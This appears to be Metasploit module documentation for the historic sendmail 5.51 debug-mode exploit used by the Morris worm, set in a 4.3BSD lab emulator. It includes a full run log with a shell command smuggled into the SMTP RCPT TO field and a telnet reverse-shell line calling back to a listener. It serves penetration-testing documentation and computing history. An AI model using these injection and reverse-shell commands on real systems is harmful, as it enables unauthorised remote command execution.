## Vulnerable Application

### Description

This module exploits `sendmail`'s well-known historical debug mode to
escape to a shell and execute commands in the SMTP `RCPT TO` command.

This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

### Setup

A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.

For manual setup, please follow the Computer History Wiki's
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### 0

This targets `sendmail` version 5.51 from 1986-05-02.

## Options

### RPORT

Set this to the target port. The default is 25 for `sendmail`, but the
port may be forwarded when NAT (SLiRP) is used in SIMH.

### PAYLOAD

Set this to a Unix command payload. Currently, only `cmd/unix/reverse`
and `cmd/unix/generic` are supported.

## Scenarios

### `sendmail` 5.51 on 4.3BSD

```
msf5 > use exploit/unix/smtp/morris_sendmail_debug
msf5 exploit(unix/smtp/morris_sendmail_debug) > options

Module options (exploit/unix/smtp/morris_sendmail_debug):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   25               yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   @(#)version.c       5.51 (Berkeley) 5/2/86


msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(unix/smtp/morris_sendmail_debug) > run

[*] Started reverse TCP double handler on 192.168.56.1:4444
[*] 127.0.0.1:25 - Connecting to sendmail
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
[*] 127.0.0.1:25 - Expecting: /220.*Sendmail/
[*] 127.0.0.1:25 - Sending: DEBUG
[*] 127.0.0.1:25 - Expecting: /200 Debug set/
[*] 127.0.0.1:25 - Sending: MAIL FROM:<3V900gQTSR70m6QPRYJnf3eoUIe6>
[*] 127.0.0.1:25 - Expecting: /250.*Sender ok/
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 127.0.0.1:25 - Expecting: /250.*Recipient ok/
[*] 127.0.0.1:25 - Sending: DATA
[*] 127.0.0.1:25 - Expecting: /354 Enter mail.*itself/
[*] 127.0.0.1:25 - Sending:  PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 127.0.0.1:25 - Sending: export PATH
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 3935|telnet 192.168.56.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.56.1 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: .
[*] 127.0.0.1:25 - Expecting: /250 Ok/
[*] 127.0.0.1:25 - Sending: QUIT
[*] 127.0.0.1:25 - Expecting: /221.*closing connection/
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ISj759F8jEik4HAW;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58037) at 2020-02-06 15:51:28 -0600
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you

whoami
daemon
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

Would you like to play a game?
```
